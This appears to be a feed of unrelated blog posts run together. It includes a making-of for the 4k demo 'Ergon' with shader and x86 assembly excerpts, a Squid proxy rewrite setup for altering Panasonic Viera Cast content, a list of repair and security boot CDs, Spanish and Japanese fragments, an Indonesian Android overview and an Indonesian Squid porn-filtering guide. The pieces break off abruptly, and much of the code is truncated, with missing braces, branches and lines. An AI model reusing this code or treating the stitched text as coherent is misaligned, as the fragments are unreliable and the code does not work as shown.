The 2nd scene was using a font rendering coupling with the raymarcher.... a kind of flying flag, with the logo FRequency appearing from left to right with a light on it... (I will probably release those effects on pouet just for the record...), that was also a fresh use of raymarching... didn't see anything like this in latest 4k production, so, I was expecting to insert this text in the 4k, as It's not so common... The code to use the d3d font was not too fat... so I was still confident to be able to use those 2 scenes.

After that, I was looking for some nasty objects... so for the 3rd scene, I tried to randomly play with some weird functions and ended up with a kind of "raptor" creature... I wanted also to use a weird generated texture I found few month ago, that was perfect for it.

Finally, I wanted to use the texture to make a kind of lava sea with a moving snake on it... that was the last scene I coded (and of course, 2 others scenes that are too ugly to show here! :) ).

We also started at that time, in February, to work on the music, and as I explained in my earlier posts, we used 4klang synth for the intro. But making all those scenes with a music prototype, the "crinklered" compressed exe was more around 5ko... even If the shader code was already optimized in size, using some kind of preprocessor templating (like in rudebox or receptor). The intro was of course laking a clear direction, there was no transitions between the scenes... and most importantly, It was not possible to fit all those scenes in 4k, while expecting the music to grow a little bit more in the final exe...

The story of the Worm-Lava texture

Last year, around November, while I was playing with several perlin's like noise, I found an interesting variation using perlin noise and the marble-cosine effect that was able to represents some kind of worms, quite freaking ugly in some way, but that was a unique texture effect!

(Click to enlarge, lots of details in it!)

This texture was primarily developed in C# but the code was quite straightforward to port in a texture shader... Yep, that's probably an old trick with D3D9 to use the function D3DXFillTextureTX to directly fill a texture from a shader with a single line of code... Why using this? Because It was the only way to get a noise() function accessible from a shader, without having to implement it... As weird as it may sounds, the HLSL perlin noise() function is not accessible outside a texture shader. A huge drawback of this method is also that the shader is not a real GPU shader, but is instead computed on the CPU... that explain why ergon intro is taking so long to generate the texture at the beginning (with a 1280x720 texture resolution for example).

So how does look this texture shader in order to generate this texture?
// -------------------------------------------------------------------------
// worm noise function
// -------------------------------------------------------------------------
#define ty(x,y) (pow(.5+sin((x)*y*6.2831)/2,2)-.5)
#define t2(x,y) ty(y+2*ty(x+2*noise(float3(cos((x)/3)+x,y,(x)*.1)),.3),.7)
#define tx(x,y,a,d) ((t2(x, y) * (a - x) * (d - y) + t2(x - a, y) * x * (d - y) + t2(x, y - d) * (a - x) * y + t2(x - a, y - d) * x * y) / (a * d))

float4 x( float2 x : position, float2 y : psize) : color {
float a=0,d=64;
// Modified FBM functions to generate a blob texture
a += abs(tx(x.x*d,x.y*d,d,d)/d);
return a*2;

The tx macro is basically applying a tiling on the noise.
The core t2 and ty macros are the one that are able to generate this "worm-noise". It's in fact a tricky combination of the usual cosine perlin noise. Instead of having something like cos(x + noise(x,y)), I have something like special_sin( y + special_sin( x + noise(cos(x/3)+x,y), power1), power2), with special_sin function like ((1 + sin(x*power*2*PI))/2) ^ 2

Also, don't be afraid... this formula didn't came out of my head like this... that was clearly after lots of permutations from the original function, with lots of run/stop/change_parameters steps! :D

Music and synchronization

It took some time to build the music theme and to be satisfied with it... At the beginning, I let ulrick making a first version of the music... But because I had a clear view of the design and direction, I was expecting a very specific progression in the tune and even in the chords used... That was really annoying for ulrick (excuse-me my friend!), as I was very intrusive in the composition process... At some point, I ended up in making a 2 pattern example of what I wanted in terms of chords and musical ambiance... and ulrick was kind enough to take this sample pattern and clever to add some intro's musical feeling in it. He will be able to talk about this better than me, so I'll ask him if he can insert some small explanation here!

ulrick here: « working with @lx on this prod was a very enjoyable job. I started a music which @lx did not like very much, it did not reflect the feelings that @lx wanted to give through the Ergon. He thus composed a few patterns using a very emotional musical scale. I entered into the music very easily and added my own stuffs. For the anecdote, I added a second scale to the music to allow for a clearer transition between the first and second parts of the Ergon. After doing so, we realized that our music actually used the chromatic scale on E »

The synchronization was the last part of the work in the demo. I first used the default synchronization mechanism from the 4klang... but I was lacking some features like, if the demo is running slowly, I needed to know exactly where I was... Using plain 4klang sync, I was missing some events on slow hardware, even preventing the intro to switch between the scenes, because the switching event was missed by the rendering loop!

So I did my own small synchronization based on regular events of the snare and a reduce view of the sample patterns for this particular events. This is the only part of the intro that was developed in x86 assembler in order to keep it as small as possible.

The whole code was something like this :
static float const_time = 0.001f;
static int SMOOTHSTEP_FACTOR = 3;

static unsigned char drum_flags[96] = {
// pattern n° time z.z sequence
1,1,1,1, // pattern 0 0 0 0
1,1,1,1, // pattern 1 7,384615385 4 1
0,0,0,0, // pattern 2 14,76923077 8 2
0,0,0,0, // pattern 3 22,15384615 12 3
0,0,0,0, // pattern 4 29,53846154 16 4
0,0,0,0, // pattern 5 36,92307692 20 5
0,0,0,0, // pattern 6 44,30769231 24 6
0,0,0,0, // pattern 7 51,69230769 28 7
0,0,0,1, // pattern 8 59,07692308 32 8
0,0,0,1, // pattern 8 66,46153846 36 9
1,1,1,1, // pattern 9 73,84615385 40 10
1,1,1,1, // pattern 9 81,23076923 44 11
1,1,1,1, // pattern 10 88,61538462 48 12
0,0,0,0, // pattern 11 96 52 13
0,0,0,0, // pattern 2 103,3846154 56 14
0,0,0,0, // pattern 3 110,7692308 60 15
0,0,0,0, // pattern 4 118,1538462 64 16
0,0,0,0, // pattern 5 125,5384615 68 17
0,0,0,0, // pattern 6 132,9230769 72 18
0,0,0,0, // pattern 7 140,3076923 76 19
0,0,0,1, // pattern 8 147,6923077 80 20
1,1,1,1, // pattern 12 155,0769231 84 21
1,1,1,1, // pattern 13 162,4615385 88 22

// Calculate time, synchro step and boom shader variables
__asm {
fild dword ptr [time] // st0 : time
fmul dword ptr [const_time] // st0 = st0 * 0.001f
fstp dword ptr [shaderVar.x] // shaderVar.x = time * 0.001f
mov eax, dword ptr [MMTime.u.sample]
jae not_first_drum
xor eax,eax
idiv dword ptr [SAMPLES_PER_DRUMS] // eax = drumStep , edx = remainder step
mov dword ptr [drum_step], eax
fild dword ptr [drum_step]
fstp dword ptr [shaderVar.z] // shaderVar.z = drumStep

not_end: cmp byte ptr [eax + drum_flags],0
jne no_boom

sub eax,edx
jae boom_ok
xor eax,eax
mov dword ptr [shaderVar.y],eax
fild dword ptr [shaderVar.y]
fidiv dword ptr [SAMPLES_PER_DROP_DRUMS] // st0 : boom
fild dword ptr [SMOOTHSTEP_FACTOR] // st0: 3, st1-4 = boom
fsub st(0),st(1) // st0 : 3 - boom , st1-3 = boom
fsub st(0),st(1) // st0 : 3 - boom*2, st1-2 = boom
fmul st(0),st(1) // st0 : boom * (3-boom*2), st1 = boom
fmulp st(1),st(0)
fstp dword ptr [shaderVar.y]

That was smaller then what I was able to do with pure 4klang sync... with the drawback that the sync was probably too simplistic... but I couldn't afford more code for the sync... so...

Final mixing

Once the music was almost finished, I spent a couple of days to work on the transitions, sync, camera movements. Because It was not possible to fit the 4 scenes, I had to mix the scene 3 (the raptor) and 4 (the snake and the lava sea), found a way to put a transition through a "central brain". Ulrick wanted to put a different music style for the transition, I was not confident with it... until I put the transition in action, letting the brain collapsed while the space under it was digging all around... and the music was fitting very well! cool!

I did also use a simple big shader for the whole intro, with some if (time < x) then scene_1 else scene_2...etc. I didn't expect to do this, because this is hurting the performance in the pixel shader to do this kind of branch processing... But I was really running out of space here and the only solution was in fact to use a single shader with some repetitive code. Here is an excerpt from the shader code : You can see how scene and camera management has been done, as well as for lights. This part was compressing quite well due to its repetitive pattern.
// -------------------------------------------------------------------------

// t3

// Helper function to rotate a vector. Usage :

// t3(mypoint.xz, .7); <= rotate mypoint around Y axis with .7 radians
// -------------------------------------------------------------------------
float2 t3(inout float2 x,float y){
return x=x*cos(y)+sin(y)*float2(-x.y,x.x);

// -------------------------------------------------------------------------
// v : main raymarching function
// -------------------------------------------------------------------------
float4 v(float2 x:texcoord):color{
float a=1,b=0,c=0,d=0,e=0,f=0,i;
float3 n,o,p,q,r,s,t=0,y;
int w;
r=normalize(float3(x.x*1.25,-x.y,1)); // ray
x = float2(.001,0); // epsilon factor

// Scene management
if (z.z<39) {
w = (z.z<10)?0:(z.z>26)?3+int(fmod(z.z,5)):int(fmod(z.z,3));

if (w==0) { p=float3(12,5+30*smoothstep(16,0,z.x),0);t3(r.yz,1.1*smoothstep(16,0,z.x));t3(r.xz,1.54); }
if (w==1) { p=float3(-13,4,-8);t3(r.yz,.2);t3(r.xz,-.5);t3(r.xy,sin(z.x/3)/3); }
if (w==2) { p=float3(0,8.5,-5);t3(r.yz,.2);t3(r.xy,sin(z.x/3)/5); }
if (w==3) {
t3(r.yz, sin(z.x/5)*.6);
t3(r.xz, 1.54+z.x/5);
t3(r.xy, cos(z.x/10)/3);

if (w == 4) {
t3(r.yz, sin(z.x/5)/5);
t3(r.xz, 1.54+z.x/3);
t3(r.xy, sin(z.x/10)/3);

if (w > 4) {
t3(r.yz, 1.54*sin(z.x/5));
t3(r.xz, .7+z.x/2);
t3(r.xy, sin(z.x/10)/3);
} else if (z.z<52) {
t3(r.yz, .9);
t3(r.xz, 1.54+z.x/4);
} else if (z.z<81) {
w = int(fmod(z.z,3));
if (w==0 ) {
t3(r.yz, sin(z.x/5)/5);
t3(r.xz, 1.54+z.x/3);
t3(r.xy, sin(z.x/10)/3);
if (w==1 ) {
t3(r.yz, 1.1);
t3(r.xz, z.x/4);
if (w==2 ) {
t3(r.yz, sin(z.x/5)/2);
t3(r.xz, 1.54+z.x/5);
t3(r.xy, cos(z.x/10)/3);
} else {

// Boom effect on camera

// Lights
static float4 l[6] = {{.7,.2,0,2},{.7,0,0,3},{.02,.05,.2,7},

Compression statistics

Final compression results are given in the following table:

So to summarize, total exe size is 4070 bytes, and is composed of :
  • Synth code + music data is taking around 35% of the total exe size = 1461 bytes
  • Shader code is taking 36% = 1467 bytes
  • Main code + non shader data is 14% = 549 bytes
  • PE + crinkler decoder + crinkler import is 15% = 593 bytes

The intro was finished around the 13 march 2010, well ahead BP2010. So that was damn cool... I spent the rest of my time until BP2010 to try to develop a procedural 4k gfx, using D3D11 compute shaders, raymarching and a Global Illumination algorithm... but the results (algo finished during the party) disappointed me... And when I saw the fantastic Burj Babil by Psycho, he was right about using a plain raymarcher without any complicated true light management... a good "basic" raymarching algo, with some tone mapping finetune was much more relevant here!

Anyway, my GI experiment on the compute shader will probably deserve an article here.

I really enjoyed to make this demo and to see that ergon was able to make it in the top 3... after seeing BP2009, I was not expecting at all the intro to be in the top 3!... although I know that the competition this year was far much easier than the previous BP!

Anyway, that was nice to work with my friend ulrick... and to contribute to the demoscene with this prod. I hope that I will be able to keep on working on the demos like this... I still have lots of things to learn, and that's cool!
          Setting up a Development Environment        
In order to perform any development, you need a development environment. How you choose to setup yours is up to you, however below I will detail how I did mine. Whichever way you choose you need to do 4 things: -
  • Provide a web server to serve up your modified content.
  • Create a web proxy server to redirect access to your web server.
  • Point your Panasonic device to your web proxy.
  • Download and host content from Panasonic's Viera Cast servers and modify them to your needs. This will be covered in the next post.
For my current environment I'm using Ubuntu Linux since it provides a full set of features including Apache 2 (web server) and Squid (web proxy). In future I intend to replicate this setup on my Western Digital MyBook World (NAS unit), which has a much smaller power footprint and is always-on. In theory the same should be possible for other customisable NAS units (Synology, Q-NAP et al).

Web Server

The web server I use is Apache 2. For development purposes I'm using a bog-standard out-of-the-box installation. In Ubuntu this serves pages from /var/www on port 80.

Web Proxy

The web proxy I'm using is Squid (default port 3128). I modified this slightly (by editing /etc/squid/squid.conf) to minimize the footprint as follows: -
  • Add "http_access allow all" (bad practice but this is development in my own home - You need to add something that lets your TV/device and development PC access the proxy).
  • Add "cache_dir null /tmp" and "maximum_object_size 0 KB" (to disable disk cache - we only care about the URL redirection features so this saves space).
  • Add "useragent_log /var/log/squid/useragent.log" (the reason will become clear soon).
  • Add "url_rewrite_program /etc/squid/mirror_and_redirect.sh" (this points to a redirect script we will create)
I then created a URL rewrite program called /etc/squid/mirror_and_redirect.sh (and made it executable) containing the following: -


while read url rest; do
filename=`echo $url | sed 's^http://^^g' | sed 's^?.*^^g'`
if [ -f /var/www/$filename ]; then
# We found a matching local file to replace, so redirect to it and log the redirect.
echo "http://localhost/$filename"
echo "http://localhost/$filename" >> /var/log/squid/mirror_and_redirect.log
# No match, so don't modify the URL and log the URL.
echo "$url" >> /var/log/squid/mirror_and_redirect.log

The purpose of this script is a follows. Every HTTP request passed via our proxy is parsed by the script and compared against the contents of /var/www. If a matching file exists then it adds a redirect to http://localhost/our_replacement_file to redirect the client (i.e. the Panasonic device) to our local modified file. It logs all this information to mirror_and_redirect.log so we can see what's been served locally and what's been passed through.

Configure TV

Finally I configured my TV to access the web via the proxy. On my Panasonic G20 Plasma this is accessed under Menu...Setup...Network Setup...Proxy Settings. I set the address to the IP address of my Ubuntu server and port to 3128 (Squid). How you do yours depends on what you've got. If you can't figure it out, you probably shouldn't go any further :D

Assuming Squid is now working, Viera Cast should work as normal on your device. And now the fun begins...
          List of Downloadable Computer Repair CDs        
Sometimes you get unlucky enough that your computer crashes without you having any kind of backup. So, its not your fault (untill you take the sole responsibility :D) but this situation is very pathetic. I'm saying so because quite a few years before i faced this very similar kind of problem and i lost GBs of my very important and loving data in a flash. Yeah, sour memories, but i surely don't want that to happen to any of us. So guys, I've compiled a large list of CDs for various computer repair tasks. In this list, the following types of CD are available for download: Antivirus Boot CDs, Recovery Disks, Hardware Diagnostic Boot CDs, Network Testing/Monitoring, Data Recovery Boot CDs and Special Purpose CDs.

Some of these are free to download, some are not. Be sure to read the EULA for the CD’s you download and the applications you use to make sure you are allowed to use them in the manner you plan to use them in. Many of the CDs contain a variety of different programs and some of the applications are free to use as you please, but some of them disallow commercial use. So be sure to read and abide by the EULA for whatever you use.
Also, some of these CD’s may set off an antivirus false positive due to their virus removal, password cracking, system file changing nature. Konboot is one such CD that will set off antivirus software. Its best to scan the CDs that are setting off your antivirus using a site like Virustotal.com and make your own decisions.

Antivirus Boot Disks

Avira AntiVir Rescue SystemDownload
BitDefender Rescue CDDownload
Dr Web LIVE CDDownload
Fsecure Live CdDownload
Kaspersky Antivirus Live CDDownload
VBA32 VirusBlokAda (Russian)Download
PcTools Alternate Operating System Scanner (AOSS)Download
Avast BART CDDownload
GData (British)Download
AVG Rescue CDDownload
ClamAV Live CD Open Diagnostics Live CDDownload

General Purpose Recovery Disks

FREE UBCD4win Ultimate Boot CD for WindowsDownload
FREE UBCD Ultimate Boot CDDownload
FREE Trinity Rescue CDDownload
FREE System Rescue CD x86Download
FREE System Rescue CD (sun sparc)Download
FREE System Rescue CD (power PC/mac)Download
FREE Windows Vista Recovery Disk (32 bit/ Microsoft)Download
FREE Windows Vista Recovery Disk (64 bit / Microsoft)Download
FREE Windows 7 Recovery Disk (Microsoft)Download
FREE INSERT (inside security rescue toolkit)Download
FREE Microsoft ERD/DART 2009Download
FREE Bootzilla for WindowsDownload

Hardware Diagnostic Boot CD’s

FREE Inquisitor (hardware testing software)Download
FREE Inquisitor 64Download
FREE Microsoft Memory DiagnosticDownload

Network Security Testing / Monitoring

FREE Network Security ToolkitDownload
FREE BackTrack network penetration testingDownload
FREE Knoppix STD (security tools distribution)Download
FREE nUbuntu network penetration testingDownload

Data Recovery Boot CD’s

FREE RIP (Recovery Is Possible)Download
Helix (computer forensics / electronic discovery / incident response)Download
Caine Computer Aided Investigative EnvironmentDownload
Macquisition CF forensics for macsDownload
The Farmer’s Boot CDDownload
Puppy LinuxDownload

Special Purpose Boot CD’s

FREE Samurai Web Application TestingDownload
FREE Offline NT Password & Registry EditorDownload
FREE PC CMOS CleanerDownload
FREE Parted MagicDownload
FREE Partition Wizard contrib IISJMANDownload
FREE Ping (backup / restore hd images across network)Download
FREE Incognito (completely anonymous web everything)Download

Other CD’s of Interest:

Some CDs have been purposely left out of this list as they contain illegal software.


          Top 10 Must watch videos for Entrepreneurs.        
Being an entrepreneur shows the real guts of a person. Not only it clearly indicates the talent and the real brainstorm of that genius, but also unveils the struggle. Obviously becoming a successful entrepreneur is not a cakewalk, it takes some tough decisions and hard work, you have to be audacious.
Here i'm gonna show you best 10 Youtube videos to become a successful entrepreneur, that will surely help for any problem you come across on your way.

1.Developing a CEO within you






Visual Studio Code



Markdown Live Preview









Visual Studio Codeは、Markdownを書くためだけにIDEをインストールしたくない、 Markdown Live Previewは、入力域とプレビュー域の幅が狭い、という理由で選択しませんでした。

          Desinstalar Linux sin romper Windows        

Muchas veces queremos desinstalar Linux sin romper Windows cuando tenemos un arranque dual y lo que pasa cuando eliminamos la partición de Linux es que nos cargamos el grub(sistema de arranque de Linux) y nos quedamos sin sistema de arranque y el Windows que teníamos por tanto no arranca. A veces cuando tenemos Windows y […]

The post Desinstalar Linux sin romper Windows appeared first on Victor Robles.

          Como hacer un USB Multibooteable con RMPrepUSB, Easy2Boot y Yumi Linux        

¿Qué es un usb Multibooteable? Un USB Multibootealbe o multi-arrancable es un pendrive que nos permite tener varios sistemas operativos dentro de el dispuestos a ser instalados o utilizados en Live, de forma que cuanto tenemos que instalar sistemas operativos, recuperar datos, o hacer cualquier otra cuestión que requiera arrancar un sistema desde un medio […]

The post Como hacer un USB Multibooteable con RMPrepUSB, Easy2Boot y Yumi Linux appeared first on Victor Robles.

          Thoughts for ArtServe Interview        
Computer interface in a shoe box.

Today I had an interview with Jennifer Baum, a writer for ArtServe Michigan. They're doing an article on the Kalamazoo Makers Guild meetup group. In preparation for our discussion Jennifer was kind enough to supply me with some topics we might discuss and I jotted down some notes while I thought about what I would say. Here are those notes and roughly what I said.
About Kalamazoo Makers Guild...

The Kalamazoo Maker's Guild is a group of people interested in DIY technology, science and design. We more or less pattern ourselves after the Homebrew Computer Club that founded Silicon Valley. Like them, our members tend to have some background in a related profession, but that's by no means a prerequisite. This group is about the things we do for fun, because they interest us, and anybody can be interested in making stuff. We meet every couple of months, report on the status of our various projects and sometimes listen to a presentation or hold an ad hoc roundtable on a topic that catches our interest. "Probably the most useful aspect of the group is that you start to feel accountable to the other members of the group and you're motivated to make progress on your project before the next meeting."

How did it get started...

When I gave up my web design business I ended the professional graphic design association I'd formed on Meetup.com, and then I had room on the service to start another group. MAKE magazine had really caught my attention. I did a few projects from the magazine and thought it would be fun and helpful to know other people who were working on the same kinds of things. The group didn't get going, though, until about 8 months ago when Al Hollaway from the       posted to an online forum about RepRap 3D printers at the same time I was building one. He wanted to meet and talk about RepRap. I told him about my Meetup group. We joined forces and here we are.


Meetup.com is a great web site because it's a web service that's all about meeting people nearby in person to share a common interest.

About membership and kinds of projects ...

The group is growing steadily now. We have twenty something members and we're seeing membership tick up at an increasing rate month to month. We have a high school student who is working designing assistive devices for the blind using sonic rangefinders, one member who last meeting showed off a prototype of computer interface built into a shoe box, and another member is on the verge of completing a working DIY Segway (the self-balancing scooter) made using a pair of battery-powered drills for motors. Al should be done with his RepRap 3D printer and I've just finished my 2nd. At least two other members are in some stage of building their own 3D printers. I'm building both a laser etcher and a 3D scanner right now, and I'm excited to start playing with the products of a couple Kickstarter projects I've backed. There are a few of us about to start building CNC milling machines, and there's been a lot of excitement in the group around the brand new, hard-to-get Raspberry Pi (a $25 computer.) Almost all the members so far have dabbled in a bit of Arduino hacking. One member is designing a flame thrower for Burning Man. Another is making a calibration device for voltage meters. So, there's a range of things going on.

Where do I see this headed....

Our approach to this group has been to learn from the mistakes other groups have made. All of the other groups I've seen in Kalamazoo start out with facilities and try to bring in members to support and justify it. Getting people to work on actual projects that interest them is something that comes later down the road. It's the, "if you build it they will come" approach. Those groups quickly get into trouble managing the building and funding, and they go away. We're coming at it from the opposite direction. We're gathering together a community of makers first, people who are already doing things on their own. Once we reach a tipping point then we'll worry about the next step, like getting a hackerspace put together. That kind of bottom-up approach is, I think, much more sustainable and durable, and it fits in with our modern culture (particularly in the maker subculture.)  It was good enough for Homebrew, so it's good enough for us.

About impact...

Silicon Valley came out of a group like this, so the potential is there for us to have a big impact on the community. Being a college town we have access to a lot of smart people, and Kalamazoo has a strong progressive, energetic, entrepreneurial vibe going on. I think what's more likely, though, is that we will have an impact in aggregate with all the other makers--groups and individuals--around the globe.

"Makers aren't just hacking new technologies, we're hacking a new economy. We're trying to figure out how to live in a world without scarcity."

The unsung official slogan of the RepRap project is, "wealth without money."

I don't know that another story like Apple is likely to happen again. Steve Jobs relied on a very traditional, very closed model for his business, as did most of the people of that era who went on to make a name for themselves in technology. The ethos of that time was centered around coming up with a big idea and capitalizing on that idea to the exclusion of the competition. It's interesting that even then this view was at odds with that of his partner, Steve Wozniak, who was content to build computers in his garage and share what he learned with his friends at Homebrew. In this way Wozniak was much more like the modern maker/hacker and is probably one of this hobby's forefathers.

Makers/hackers today are all about open-ness and sharing -- not in a hippy, touchy-feely kind of way, but in a calculated way that weighs the costs and benefits of being open verses closed. The success of Linux and the ever increasing number of open source software, and now hardware, projects has proven that there's enormous power in being open. "We tend to think that's the way to change the world."

About the Maker Movement....

I know there are a lot of people who are keen to talk about the "maker movement" but I'm not so sure that I would characterize it as a movement. If it is, then it started in the 60's with people like my dad who were HAM radio enthusiasts and tinkered around with making their own radios and antennas. I think that what we're observing and calling a movement is really an artifact of reaching the steep part of Moore's Law. Ray Kurzweil is famous for talking about this phenomenon. The pace of advances in technology is itself accelerating, it's exponential, and moving so fast now that if you're not paying close attention things seem to pop out of nowhere. For makers, technology has reached a point where Moore's Law has forced down prices and increased the availability of things that just a few years ago were far out of reach. We're just taking those things and running with it. In effect, we're just the people paying close attention.

About me...

I started college in the engineering program at WMU, but I couldn't hack it and dropped out. I went back to community college and got a degree in graphic design. In my professional life I've been paid to be a web designer, photographer, videographer, IT manager, technical document writer, photo lab manager, artist, and I've even been paid to be a poet. For fun I do all those things and also play guitar, peck at a piano, and watch physics and math lectures from the MIT OpenCourseWare web site, do exercises on Khan Academy, play board games and roleplaying games, and commit acts of crafting -- woodworking and model making. For work, I now teach at the Kalamazoo Institute of Arts. I've taught web design, digital illustration and this fall I'll be teaching classes in 3D modeling and 3D printing with the RepRap 3D printer I have on loan there. I live near downtown Kalamazoo with my wife and many pets, including a 23 year old African Grey parrot named KoKo.

Post interview notes...

I mentioned SoliDoodle, the fully assembled, $500 3D printer. The big hackerspace in Detroit is called i3detroit. Also, Chicago has Pumping Station: One. I'm on the forums for both and will be visiting each this summer. The presentation about 3D scanning we had was from Mike Spray of Laser Abilities. You can actually see the entire presentation on my YouTube channel. Thingiverse was the web site that I kept going on about where you can find 3D designs for printing.

Handphone / Hp Android semakin populer di dunia dan menjadi saingan serius bagi para vendor handphone yang sudah ada sebelumnya seperti Nokia, Blackberry dan iPhone.
Tapi bila anda menanyakan ke orang Indonesia kebanyakan “Apa itu Android ?” Kebanyakan orang tidak akan tahu apa itu Android, dan meskipun ada yang tahu pasti hanya untuk orang tertentu yang geek / update dalam teknologi.
Ini disebabkan karena masyarakat Indonesia hanya mengenal 3 merek handphone yaitu Blackberry, Nokia, dan merek lainnya :)

Ada beberapa hal yang membuat Android sulit (belum) diterima oleh pasar Indonesia, antara lain:

  • Kebanyakan handphone Android menggunakan input touchscreen yang kurang populer di Indonesia,
  • Android membutuhkan koneksi internet yang sangat cepat untuk memaksimalkan kegunaannya padahal Internet dari Operator selular Indonesia kurang dapat diandalkan,
  • Dan yang terakhir anggapan bahwa Android sulit untuk dioperasikan / dipakai bila dibandingkan dengan handphone lain macam Nokia atau Blackberry.

Apa itu Android

Android adalah sistem operasi yang digunakan di smartphone dan juga tablet PC. Fungsinya sama seperti sistem operasi Symbian di Nokia, iOS di Apple dan BlackBerry OS.
Android tidak terikat ke satu merek Handphone saja, beberapa vendor terkenal yang sudah memakai Android antara lain Samsung , Sony Ericsson, HTC, Nexus, Motorolla, dan lain-lain.
Android pertama kali dikembangkan oleh perusahaan bernama Android Inc., dan pada tahun 2005 di akuisisi oleh raksasa Internet Google. Android dibuat dengan basis kernel Linux yang telah dimodifikasi, dan untuk setiap release-nya diberi kode nama berdasarkan nama hidangan makanan.
Keunggulan utama Android adalah gratis dan open source, yang membuat smartphone Android dijual lebih murah dibandingkan dengan Blackberry atau iPhone meski fitur (hardware) yang ditawarkan Android lebih baik.
Beberapa fitur utama dari Android antara lain WiFi hotspot, Multi-touch, Multitasking, GPS, accelerometers, support java, mendukung banyak jaringan (GSM/EDGE, IDEN, CDMA, EV-DO, UMTS, Bluetooth, Wi-Fi, LTE & WiMAX) serta juga kemampuan dasar handphone pada umumnya.

Versi Android yang beredar saat ini

Eclair (2.0 / 2.1)

Versi Android awal yang mulai dipakai oleh banyak smartphone, fitur utama Eclair yaitu perubahan total struktur dan tampilan user interface dan merupakan versi Android yang pertama kali mendukung format HTML5.
Apa itu android

Froyo / Frozen Yogurt (2.2)

Android 2.2 dirilis dengan 20 fitur baru, antara lain peningkatan kecepatan, fitur Wi-Fi hotspot tethering dan dukungan terhadap Adobe Flash.

Gingerbread (2.3)

Perubahan utama di versi 2.3 ini termasuk update UI, peningkatan fitur soft keyboard & copy/paste, power management, dan support Near Field Communication.

Honeycomb (3.0, 3.1 dan 3.2)

Merupakan versi Android yang ditujukan untuk gadget / device dengan layar besar seperti Tablet PC; Fitur baru Honeycomb yaitu dukungan terhadap prosessor multicore dan grafis dengan hardware acceleration.
Tablet pertama yang memakai Honeycomb adalah tablet Motorola Xoom yang dirilis bulan Februari 2011.
Tablet Android
Google memutuskan untuk menutup sementara akses ke source code Honeycomb, hal ini dilakukan untuk mencegah perusahaan pembuat handphone menginstall Honeycomb pada smartphone.
Karena pada versi Android sebelumnya banyak perusahaan yang menggunakan Android ke dalam tablet PC yang menyebabkan pengalaman buruk penggunanya dan mengesankan citra Android tidak bagus.

Ice Cream Sandwich (4.0)

Anroid 4.0 Ice Cream Sandwich diumumkan pada 10 Mei 2011 di ajang Google I/O Developer Conference (San Francisco) dan resmi dirilis pada tanggal 19 Oktober 2011 di Hongkong. “Android Ice Cream Sandwich” akan dapat digunakan baik di smartphone ataupun tablet. Fitur utama yang ditambahkan di Android 4.0 ialah Face UnlockAndroid Beam, perubahan major User Interface, dan ukuran layar standar (native screen) beresolusi 720p (high definition).

Market Share Android

Pada tahun 2012 sekitar 630 juta smartphone akan terjual diseluruh dunia, dimana diperkirakan sebanyak 49,2% diantaranya akan menggunakan OS Android.
Data yang dimiliki Google saat ini mencatat bahwa 500.000 Handphone Android diaktifkan setiap harinya di seluruh dunia dan nilainya akan terus meningkat 4,4% /minggu.
PlatformAPI LevelDistribution
Android 3.x (Honeycomb)110,9%
Android 2.3.x (Gingerbread)9-1018,6%
Android 2.2 (Froyo)859,4%
Android 2.1 (Eclair)5-717,5%
Android 1.6 (Donut)42,2%
Android 1.5 (Cupcake)31,4%
Data distribusi versi Android yang beredar di dunia sampai Juni 2011

Applikasi Android

Android memiliki basis developer yang besar untuk pengembangan applikasi, yang membuat fungsi Android menjadi lebih luas dan beragam. Android Market merupakan tempat applikasi Android didownload baik gratis ataupun berbayar yang dikelola oleh Google.
Applikasi Android di handphone
Meskipun tidak direkomendasikan, kinerja dan fitur Android dapat lebih ditingkatkan dengan melakukan Root Android. Fitur seperti Wireless Tethering, Wired Tethering, uninstall crapware, overclock prosessor, dan install custom flash ROM dapat digunakan pada Android yang sudah diroot.

Artikel Terkait

Peristiwa penting yang terjadi di dunia Teknologi pada tahun 2011 (Kaleidoskop)Chrome for Android beta rilis di Android MarketHandphone China menyetrum mati seorang pemuda di IndiaGame Android terbaik dan gratis | Link DownloadTips jika handphone terkena air
          untuk menangkal situs porno        

Untuk menangkal situs porno tidaklah sukar. Secara umum ada dua (2) teknik menangkal situs porno, yaitu:
• Memasang filter di PC pengguna.
• Memasang filter di server yang tersambung ke Internet.

Teknik yang pertama, memasang filter pada PC pengguna, biasanya dilakukan oleh para orang tua di PC di rumah agar anak-anak tidak melakukan surfing ke situs yang tidak di inginkan. Daftar lengkap filter maupun browser yang cocok untuk anak untuk aplikasi rumah tersebut dapat dilihat pada
http://www.yahooligans.com ? parent’s guide ? browser’s for kids.
http://www.yahooligans.com ? parent’s guide ? blocking and filtering.

Beberapa filter yang cukup terkenal seperti
Net Nanny, http://www.netnanny.com/
I Way Patrol, http://www.iwaypatrol.com/

Tentunya teknik memfilter seperti ini hanya dapat dilakukan bagi orang tua di rumah kepada anak-nya yang belum begitu tahu Internet.Bagi sekolah yang terdapat fasilitas internet, tentunya teknik-teknik di atas sulit di terapkan. Cara paling effisien untuk menangkal situs porno adalah dengan memasang filter pada server proxy yang digunakan di WARNET / di kantor yang digunakan mengakses Internet secara bersama-sama dari sebuah Local Area Network (LAN).Teknik ke dua (2), memasang filter situs porno tidaklah sukar. Beberapa software komersial untuk melakukan filter konten, antara lain adalah:


Mungkin yang justru paling sukar adalah memperoleh daftar lengkap situs-situs yang perlu di blokir. Daftar tersebut diperlukan agar filter tahu situs mana saja yang perlu di blokir. Daftar ratusan ribu situs yang perlu di blokir dapat di ambil secara gratis, antara lain di:


bagi sekolah atu perkantoran, alternatif open source (Linux) mungkin menjadi menarik karena tidak membajak software. Pada Linux, salah satu software proxy yang paling populer adalah squid (http://www.squid-cache.org) yang biasanya dapat di install sekaligus bersamaan dengan instalasi Linux (baik Mandrake maupun RedHat).

Untuk melakukan proses filtering pada squid tidaklah sukar, kita cukup menambahkan beberapa kalimat pada file /etc/squid/squid.conf. Misalnya

acl sex url_regex "/etc/squid/sex"
acl notsex url_regex "/etc/squid/notsex"
http_access allow notsex
http_access deny sex

buatlah file /etc/squid/sex

contoh isi /etc/squid/notsex:

contoh isi /etc/squid/sex:


untuk memasukan daftar blacklist yang di peroleh dari squidguard dll, dapat dimasukan dengan mudah ke daftar di atas tampak di bawah ini adalah daftar Access Control List (ACL) di /etc/squid/squid.conf yang telah saya buat di server saya di rumah, yaitu:

acl sex url_regex "
acl notsex url_regex "
acl aggressive url_regex "
acl drugs url_regex "
acl porn url_regex "
acl ads url_regex "
acl audio-video url_regex "
acl gambling url_regex "
acl warez url_regex "
acl adult url_regex "
acl dom_adult dstdomain "
acl dom_aggressive dstdomain "
acl dom_drugs dstdomain "
acl dom_porn dstdomain "
acl dom_violence dstdomain "
acl dom_ads dstdomain "
